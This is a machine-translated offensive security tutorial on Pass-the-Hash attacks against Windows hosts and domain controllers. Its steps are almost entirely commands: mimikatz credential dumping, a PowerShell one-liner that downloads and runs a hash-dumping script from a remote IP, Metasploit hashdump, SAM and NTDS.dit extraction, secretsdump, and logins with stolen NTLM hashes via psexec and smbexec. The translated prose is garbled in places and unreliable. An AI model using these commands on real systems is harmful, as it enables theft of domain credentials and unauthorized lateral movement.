0x01 PTH Profile
PTH, namely Pass-The-Hash, first at us, why use HASH pass, one in the target> = win server during 2012, lsass.exe process is not caught in clear-text passwords, and second, with the information improve safety awareness, weak passwords situation gradually reduced, we often encounter situations get hash was untied, summary, only the hash, we can still log in normally.
PTH attack the coolest place to take advantage of the transfer process is not hash, but the hash of the acquisition process, so the next 90% of the length of the content hash obtained.
0x02 Hash Gets
Hash acquisition of ordinary PC
2.1 mimikatz
Artifact mimikatz, be noted that: The first thing you have to have permission to perform a local administrator.
privilege::debug
sekurlsa::logonpasswords2.2 Nishang
Powershell representatives, it is also the ability to obtain the hash of:
powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.15.216:8888/Gather/Get-PassHashes.ps1');Get-PassHashesA fully functional 2.3 msf
: Next to sort out how many hash Obtaining support msf
1. processing module itself
hashdump
run hashdump
run post/windows/gather/smart_hashdump2. In addition to meterpreter comes, you can also be obtained by loading mimikatz:
load mimikatz(必须,否则无以下命令)
msv
tspkg
wdigest
kerberos
sspBelow the corresponding field, the emphasis put SSP, where the record is ipc $ password
mimikatz native commands some not applicable here, but remember hash acquisition command
mimikatz_command -f samdump::hashes
2.4 SAM get hash table
Export SAM data:
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAMUse mimikatz extract hash:
lsadump::sam /sam:SAM /system:SYSTEM
Hash domain acquisition
First of all get the same idea Hash ordinary PC, but not the same, you have to know two things
Even DC, conventional thinking hash get you still only get local user hash, hash and the user can not get the entire domain, of course, you can still get a domain administrator hash, and indeed have the right to log the entire domain.
Even within the user machine, get hash conventional thinking is still likely to get a domain administrator hash, as long as the domain administrator via RDP logged in, they will be saved to the hash in lsass.
2.5 NTDS.dit acquired hash domain controller
This idea is particularly important in the field of infiltration, because here bread his mouth all domain users hash, of course, the idea only to DC to take effect.
NTDS.dit manually export and System-hive, local or target machine guide hash, because, if the domain is large enough, the file will be particularly large.
In addition to the manual to find the path, you can see the following export command:
ntdsutil "ac i ntds" ifm "create full c:\users\tmp" q qDomain user only a few here, but the file size of up to 36M.
Next we need to extract the user hash, recommended NTDSDumpEx:
Tools Address: https://github.com/zcgonvh/NTDSDumpEx/releases
NTDSDumpEx -d ntds.dit -s system -o domain.txt
Similarly, then recommend a tool, or secretsdump under python we have repeatedly mentioned third-party libraries impacket.
python secretsdump.py -system SYSTEM -ntds ntds.dit local
2.6 secretsdump scripts directly export domain hash
Why mention it again secretsdump it, because it can be derived directly, plainly, is to automate the manual tasks our side, on the final say but also to let everyone know how it works.
python secretsdump.py rabbitmask:[email protected]First, it will export the local SAM in the hash, then all domain users IP, all succeed.
0x03 Hash transfer
The module 3.1 msf psexec
use exploit/windows/smb/psexec
set rhosts 192.168.15.181
set smbuser rabbitmask
set smbpass aad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4
3.1 impacket_smbexec
python smbexec.py -hash esaad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4 [email protected]or
python smbexec.py -hashes :0515322a55615056aaabb044a48463a4 [email protected]